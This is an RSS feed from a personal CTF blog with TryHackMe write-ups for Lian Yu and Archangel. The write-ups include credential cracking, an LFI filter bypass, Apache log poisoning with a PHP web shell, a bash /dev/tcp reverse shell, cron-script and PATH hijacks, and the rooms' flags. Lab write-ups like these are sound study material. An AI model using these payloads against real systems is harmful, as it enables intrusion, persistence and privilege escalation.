<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Portfólio</title><description>Demo Site</description><link>https://fuwari.vercel.app/</link><language>en</language><item><title>Resume</title><link>https://fuwari.vercel.app/posts/postone/post_one/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/postone/post_one/</guid><description>Look at this</description><pubDate>Thu, 07 Jun 10007 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;This site will be primarily used for small-scale cybersecurity and &lt;strong&gt;CTF&lt;/strong&gt; posts. More detailed and extensive posts or projects can be found in my Github repositories or at [LINK]&lt;/p&gt;
&lt;p&gt;This is the current layout of the items(Order by Date):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;.
├── TryHackMe/
│   └── CTF_THM/
│       ├── CTF - easy/
│       │   └── posts
│       ├── CTF - medium
│       └── CTF - hard
└── ETC/
    └── posts
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Lian Yu</title><link>https://fuwari.vercel.app/posts/lian_yu/textlian_yu/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/lian_yu/textlian_yu/</guid><description>CTF - &quot;Boot2root, Web exploitation, Privilege escalation, LFI&quot;</description><pubDate>Thu, 27 Nov 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/lianyu&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;1. Discovery Ports, Services and Directory&lt;/h1&gt;
&lt;h2&gt;Nmap&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;nmap -sC -sV -vv &amp;lt;IP Target&amp;gt;&lt;/code&gt;
![[Pasted image 20251203125804.png]]
&lt;strong&gt;Ports&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;21 - TCP/FTP(vsftpd3.0.2)&lt;/li&gt;
&lt;li&gt;22 - TCP/SSH(OpenSSH 6.7p1)&lt;/li&gt;
&lt;li&gt;80 - TCP/HTTP(Apache)&lt;/li&gt;
&lt;li&gt;111/TCP - rpcbind&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Dirsearch&lt;/h2&gt;
&lt;h3&gt;{TargetIP}&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;python3 dirsearch.py -u 10.82.138.36 -w ../wordlist/DirBuster-2007_directory-list-2.3-medium.txt&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251203133839.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;{TargetIP}/island&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;python3 dirsearch.py -u 10.82.138.36/island/ -w ../wordlist/DirBuster-2007_directory-list-2.3-medium.txt&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251203134528.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;HTML source code {TargetIP}/island/&lt;/h2&gt;
&lt;p&gt;What is vigilante?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251205110533.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;HTML source code {TargetIP}/island/2100&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251203140912.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;{TargetIP}/island/2100&lt;/h2&gt;
&lt;h3&gt;GoBuster&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;gobuster dir -u 10.82.138.36/island/2100/ -w /home/dcroce/Documentos/ComofazerUbuntu/FerramentasSec/wordlist/DirBuster-2007_directory-list-2.3-medium.txt -x ticket -t 12&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251203155046.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;{TargetIP}/island/2100/green_arrow.ticket&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020251203155336.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;2. Hashes &amp;amp; Post-Exploitation&lt;/h1&gt;
&lt;h3&gt;CyberChef&lt;/h3&gt;
&lt;h3&gt;From base58&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt; RTy8yhBQdscX -&amp;gt; !#th3h00d
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;FTP&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;$ sudo ftp {targetIP}&lt;/code&gt;
- &lt;strong&gt;user&lt;/strong&gt;: vigilante
- &lt;strong&gt;password&lt;/strong&gt;: !#th3h00d&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251204152001.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;ftp&amp;gt; ls -la  
229 Entering Extended Passive Mode (|||18166|).  
150 Here comes the directory listing.  
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .  
drwxr-xr-x    4 0        0            4096 May 01  2020 ..  
-rw-------    1 1001     1001           44 May 01  2020 .bash_history  
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout  
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc  
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user  
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile  
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png  
-rw-r--r--    1 0        0          549924 May 05  2020 &quot;Queen&apos;s_Gambit.png&quot;  
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg

ftp&amp;gt; mget aa.jpg Leave_me_alone.png &quot;Queen&apos;s_Gambit.png&quot; .other_user .profile
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Reading files using cat&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;ftp&amp;gt; !cat .other_user
 
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he ha  
d been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing  
troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of warfare. She immediately fell in love with him and realize  
d that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to privately train Slade in guerrilla warfare. In less than a year, Slade mastere  
d every fighting form presented to him and was soon promoted to the rank of lieutenant colonel. Six months later, Adeline and he were married and she became pregnant with their first ch  
ild. The war in Vietnam began to escalate and Slade was shipped overseas. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Winter  
green, to whom he would later return the favor.  
  
Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary  
soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge.[7] However, Slade kept  
this career secret from his family, even though his wife was an expert military combat instructor.  
  
A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was ag  
ainst his personal honor code. He attacked and killed the kidnappers at the rendezvous. Unfortunately, Joseph&apos;s throat was slashed by one of the criminals before Slade could prevent it,  
destroying Joseph&apos;s vocal cords and rendering him mute.  
  
After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, h  
is confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless half covering his lost right eye. Witho  
ut his mask, Slade wears an eyepatch to cover his eye.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Names&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Slade, Wilson&lt;/li&gt;
&lt;li&gt;Adeline, Kane&lt;/li&gt;
&lt;li&gt;Joseph, Wilson&lt;/li&gt;
&lt;li&gt;Wintergree&lt;/li&gt;
&lt;li&gt;Jackal&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;StegSeek&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;$ stegseek -sf aa.jpg -wl pathwordlist/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek  
[i] Found passphrase: &quot;password&quot;
[i] Original filename: &quot;ss.zip&quot;.
[i] Extracting to &quot;aa.jpg.out&quot;.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;$ file aa.jpg.out 
aa.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
$ unzip -P password aa.jpg.out
Archive:  aa.jpg.out  
 inflating: passwd.txt                 
 inflating: shado

$ cat shado    
M3tahuman
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;What do i have now?&lt;/h1&gt;
&lt;p&gt;Perhaps some unexplored directory, an untested &lt;strong&gt;SSH port&lt;/strong&gt;, and some names and a word(M3tahuman).&lt;/p&gt;
&lt;h3&gt;SSH&lt;/h3&gt;
&lt;p&gt;Using names&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ ssh slade@{TargetIP}
password:M3tahuman
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020251205120827.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;slade@LianYu:~$ ls  
user.txt  
slade@LianYu:~$ cat user.txt    
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N&apos;T}  
                       --Felicity Smoak  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020251204192527.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./Pasted%20image%2020251204191455.png&quot; alt=&quot;image&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;slade@LianYu:~$ sudo /usr/bin/pkexec /bin/bash  
root@LianYu:~#
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Archangel</title><link>https://fuwari.vercel.app/posts/archangel/archangel/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/archangel/archangel/</guid><description>CTF - &quot;Boot2root, Web exploitation, Privilege escalation, LFI&quot;</description><pubDate>Thu, 21 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/archangel&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;archangel.thm&lt;/h1&gt;
&lt;h2&gt;Notes from the page&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251215151644.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Nmap&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;`nmap -sC -sV -vv {TARGET_IP}`

#result
Scanned at 2025-12-15 13:59:36 -03 for 23s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f1d2c9d6ca40e4640506fedcf1cf38c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V
|   256 637327c76104256a08707a36b2f2840d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4CzyrcIwDQSiCg=
|   256 b64ed29c3785d67653e8c4e0481cae6c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wavefire
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;GoBuster&lt;/h2&gt;
&lt;p&gt;(Using wordlist &lt;em&gt;DirBuster-2007_directory-list-2.3-medium.txt&lt;/em&gt;)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251215145158.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I couldn&apos;t find anything that would lead me to the next step, so I tried to look at the &quot;support&quot; email, and why does it have a .thm?&lt;/p&gt;
&lt;h3&gt;vim /etc/hosts&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251215151742.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1&gt;mafialive.thm&lt;/h1&gt;
&lt;h2&gt;Notes from page&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251215152633.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;GoBuster&lt;/h2&gt;
&lt;p&gt;(Using wordlist &lt;em&gt;common.txt&lt;/em&gt;)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;gobuster dir -u http://mafialive.thm -w &amp;lt;pathToWordlist&amp;gt;![[Pasted image 20251215152957.png]]&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;mafialive.thm/robots.txt&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;curl -s http://mafialive.thm/robots.txt&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;User-agent: *
Disallow: /test.php
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;http://mafialive.thm/test.php&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img src=&quot;./Pasted%20image%2020251215172721.png&quot; alt=&quot;image&quot; /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Hmmm, this part code is interesting:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;&quot;?view/var/www/html/development_testing/mrrobot.php&quot;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;curl -s http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;/var/www/html/development_testing/test.php&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML&amp;gt;  
&amp;lt;html&amp;gt;  
  
&amp;lt;head&amp;gt;  
   &amp;lt;title&amp;gt;INCLUDE&amp;lt;/title&amp;gt;  
   &amp;lt;h1&amp;gt;Test Page. Not to be Deployed&amp;lt;/h1&amp;gt;  
   
   &amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a href=&quot;/test.php?view=/var/www/html/development_testing/mrrobot.php&quot;&amp;gt;&amp;lt;button id=&quot;secret&quot;&amp;gt;Here is a button&amp;lt;/button&amp;gt;
&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;
       CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3  
llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48  
YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQ  
oKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0g  
ZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIG  
NvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldydd  
OwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2  
R5PgoKPC9odG1sPgoKCg==    &amp;lt;/div&amp;gt;  
&amp;lt;/body&amp;gt;  
  
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;echo &quot;CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==&quot; | base64 -d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML&amp;gt;  
&amp;lt;html&amp;gt;  
  
&amp;lt;head&amp;gt;  
   &amp;lt;title&amp;gt;INCLUDE&amp;lt;/title&amp;gt;  
   &amp;lt;h1&amp;gt;Test Page. Not to be Deployed&amp;lt;/h1&amp;gt;  
   
   &amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a href=&quot;/test.php?view=/var/www/html/development_testing/mrrobot.php&quot;&amp;gt;&amp;lt;button id=&quot;secret&quot;&amp;gt;Here is a button&amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;  
       &amp;lt;?php  
  
           //FLAG: thm{explo1t1ng_lf1}  
  
           function containsStr($str, $substr) {  
               return strpos($str, $substr) !== false;  
           }  
           if(isset($_GET[&quot;view&quot;])){  
           if(!containsStr($_GET[&apos;view&apos;], &apos;../..&apos;) &amp;amp;&amp;amp; containsStr($_GET[&apos;view&apos;], &apos;/var/www/html/development_testing&apos;)) {  
               include $_GET[&apos;view&apos;];  
           }else{  
  
               echo &apos;Sorry, Thats not allowed&apos;;  
           }  
       }  
       ?&amp;gt;  
   &amp;lt;/div&amp;gt;  
&amp;lt;/body&amp;gt;  
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code has an anti-LFI mechanism, but there is a way to bypass it.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Using
/.././.././../log/apache2/access.log
# instead of
/../../../log/apache2/access.log
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;/var/www/html/development_testing/.././.././../log/apache2/access.log&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE HTML&amp;gt;  
&amp;lt;html&amp;gt;  
  
&amp;lt;head&amp;gt;  
   &amp;lt;title&amp;gt;INCLUDE&amp;lt;/title&amp;gt;  
   &amp;lt;h1&amp;gt;Test Page. Not to be Deployed&amp;lt;/h1&amp;gt;  
   
   &amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a href=&quot;/test.php?view=/var/www/html/development_testing/mrrobot.php&quot;&amp;gt;&amp;lt;button id=&quot;secret&quot;&amp;gt;Here is a button&amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt;  
          
192.168.166.197 - - [30/Dec/2025:01:30:36 +0530] &quot;GET /test.php HTTP/1.1&quot; 200 473 &quot;-&quot; &quot;Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0&quot;  
192.168.166.197 - - [30/Dec/2025:01:30:47 +0530] &quot;GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1&quot; 200 618 &quot;-&quot; &quot;curl/7.88.1&quot;  
192.168.166.197 - - [30/Dec/2025:01:31:08 +0530] &quot;GET /test.php?view=/var/www/html/development_testing/../../../log/apache2/access.log HTTP/1.1&quot; 200 482 &quot;-&quot; &quot;curl/7.88.1&quot;  
192.168.166.197 - - [30/Dec/2025:01:36:02 +0530] &quot;GET /test.php?view=/var/www/html/development_testing/../../../log/apache2/access.log HTTP/1.1&quot; 200 482 &quot;-&quot; &quot;curl/7.88.1&quot;  
   &amp;lt;/div&amp;gt;  
&amp;lt;/body&amp;gt;  
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;poising cache&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;curl -A &quot;&amp;lt;?php system($_GET[&apos;cmd&apos;]); ?&amp;gt;&quot; http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;192.168.166.197 - - [30/Dec/2025:01:39:59 +0530] &quot;GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1&quot; 200 1312 &quot;uid=33(www-data) gid=3  
3(www-data) groups=33(www-data)  
&quot; &quot;curl/7.88.1&quot;  
   &amp;lt;/div&amp;gt;  
&amp;lt;/body&amp;gt;  
  
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;RCE&lt;/h3&gt;
&lt;p&gt;Now, using:
&lt;strong&gt;Terminal 1&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nc -nlvp 4444&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Go in url
&lt;code&gt;http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&amp;amp;cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/&amp;lt;YOURIP&amp;gt;/&amp;lt;LISTEN.PORT(4444)&amp;gt;%200%3E%261%22%20%26&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;And if everything worked as expected, this is how your Terminal 1 should look now&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;www-data@ubuntu:/home$ cat archangel/user.txt  
cat archangel/user.txt  
thm{lf1_t0_rc3_1s_tr1cky}

www-data@ubuntu:/etc/cron.weekly$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don&apos;t have to run the `crontab&apos;
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   archangel /opt/helloworld.sh
17 *    * * *   root    cd / &amp;amp;&amp;amp; run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / &amp;amp;&amp;amp; run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / &amp;amp;&amp;amp; run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / &amp;amp;&amp;amp; run-parts --report /etc/cron.monthly )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Modifying&lt;/strong&gt; &lt;em&gt;helloworld.sh&lt;/em&gt; to add SSH keys to &lt;strong&gt;authorized_keys&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cat &amp;gt; helloworld.sh &amp;lt;&amp;lt; &apos;EOF&apos;  
#!/bin/bash  
mkdir -p /home/archangel/.ssh  
echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkCn42NOCaZymJdu14cQQ3a0QIGeBmOzBSl/eV/XnTYy/xGSO1TQnjqrEYeMP5TufrrhPzfJMXQTby+ijQzR1ep8hhlHM679dfytSSfR0jEbImAKkcVu5a3Zmkc9OxQedOTBb+ErxnyX/bgTY5/dhNxAHXQGa4r2Xrp1R9  
2h1pfBq3iDzvPcT0+P29H2flBipRSv7rGNpZ0537na9Wd2ZN1jgE8cH2TUht/3wzNpGOCJCyvpbtmujemMleZJIPZ7wWVSJ7/+sliOR1b0e//sfVg7VhwCfds9STW8LMJyJqgG/N0ELk7yIGlYyQaS4eU68GTk7oxvklXWwxRhXTt4fNQky5bQ34HyzZgyQ+UYj5lZWPuoZecLm+ab  
Pv/ge//J8nKbf3oru8gY3AwYsy/Q9ZV67bJJoG6XyNFH3qycChmPKKacfLo10+xk0lkbfQd7GMIzM/1Yxvlokf+qrS/YspYkt/F7Q9w1T2+/ae1lGwE3NQ7zSvWZy6OjujjBjQeWxJb3ar/CufxYBP9d/oh4ZAOBoJv2Ieh88FtAlUb7wg9lIp7xG1+7t7/kZoEboAj9nSJqHFRTOC  
UmZ0hGOZUNuhp4oUnHHCVyAwrvEvXdGADUskuXvzuU3j65AIqiLhwOER8QIcH3LGsehPJ38Ho6/NH6hCLx/fT6t3szUZRy2cLQ== user@user.com&quot; &amp;gt;&amp;gt; /home/archangel/.ssh/authorized_keys  
EOF
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;ssh -i ~/.ssh/id_rsa archangel@mafialive.thm&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;cd /home/archangel/secret

$ file backup  
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter  
/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.  
0, not stripped

cat &amp;gt; cp &amp;lt;&amp;lt; EOF
#!/bin/bash
/bin/bash -i
EOF

chmod +x cp
export PATH=/home/archangel/secret:$PATH
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Light</title><link>https://fuwari.vercel.app/posts/light/light/</link><guid isPermaLink="true">https://fuwari.vercel.app/posts/light/light/</guid><description>CTF - &quot;Welcome to the Light database application!&quot;</description><pubDate>Wed, 02 Jul 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/lightroom&quot;&gt;THM&lt;/a&gt;&lt;/p&gt;
